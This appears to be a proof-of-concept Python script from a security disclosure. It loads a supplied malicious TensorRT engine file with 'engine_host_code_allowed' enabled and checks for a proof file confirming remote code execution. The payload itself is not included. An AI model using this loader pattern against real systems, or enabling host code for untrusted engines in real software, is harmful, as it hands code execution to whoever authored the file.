| |
| """ |
| PoC Loader: Demonstrates RCE when loading a malicious TensorRT engine file. |
| |
| Usage: python load_poc.py <path_to_malicious.engine> |
| """ |
|
|
| import os |
| import sys |
| import platform |
|
|
|
|
| def main(): |
| if len(sys.argv) < 2: |
| print("Usage: python load_poc.py <path_to_malicious.engine>") |
| sys.exit(1) |
|
|
| engine_path = sys.argv[1] |
| if not os.path.exists(engine_path): |
| print(f"[!] File not found: {engine_path}") |
| sys.exit(1) |
|
|
| try: |
| import tensorrt as trt |
| except ImportError: |
| print("[!] tensorrt not installed: pip install tensorrt") |
| sys.exit(1) |
|
|
| is_windows = platform.system() == "Windows" |
| poc_file = "tensorrt_rce_poc.txt" if is_windows else "/tmp/tensorrt_rce_poc" |
|
|
| |
| if os.path.exists(poc_file): |
| os.remove(poc_file) |
|
|
| print("=" * 70) |
| print("TensorRT Engine RCE PoC — Loading Malicious Engine") |
| print("=" * 70) |
| print() |
| print(f"[*] Engine file: {engine_path}") |
| print(f"[*] Engine size: {os.path.getsize(engine_path)} bytes") |
| print(f"[*] TensorRT version: {trt.__version__}") |
| print() |
|
|
| logger = trt.Logger(trt.Logger.INFO) |
| runtime = trt.Runtime(logger) |
|
|
| |
| runtime.engine_host_code_allowed = True |
| print("[*] runtime.engine_host_code_allowed = True") |
| print("[*] Calling deserialize_cuda_engine()...") |
| print("[*] (If RCE works, you'll see output from the embedded code below)") |
| print() |
|
|
| with open(engine_path, "rb") as f: |
| engine_data = f.read() |
|
|
| |
| engine = runtime.deserialize_cuda_engine(engine_data) |
|
|
| print() |
| if engine: |
| print(f"[+] Engine loaded: {engine.num_io_tensors} I/O tensors") |
| else: |
| print("[*] Engine returned None (malicious code may still have executed)") |
|
|
| |
| if os.path.exists(poc_file): |
| print() |
| print("=" * 70) |
| print("[!!!] ARBITRARY CODE EXECUTION CONFIRMED") |
| print(f"[!!!] Proof file: {poc_file}") |
| print("=" * 70) |
| print() |
| with open(poc_file, "r") as f: |
| print(f.read()) |
| else: |
| print() |
| print(f"[*] Proof file not found at {poc_file}") |
| print("[*] Check stderr output above for execution evidence") |
|
|
|
|
| if __name__ == "__main__": |
| main() |
|
|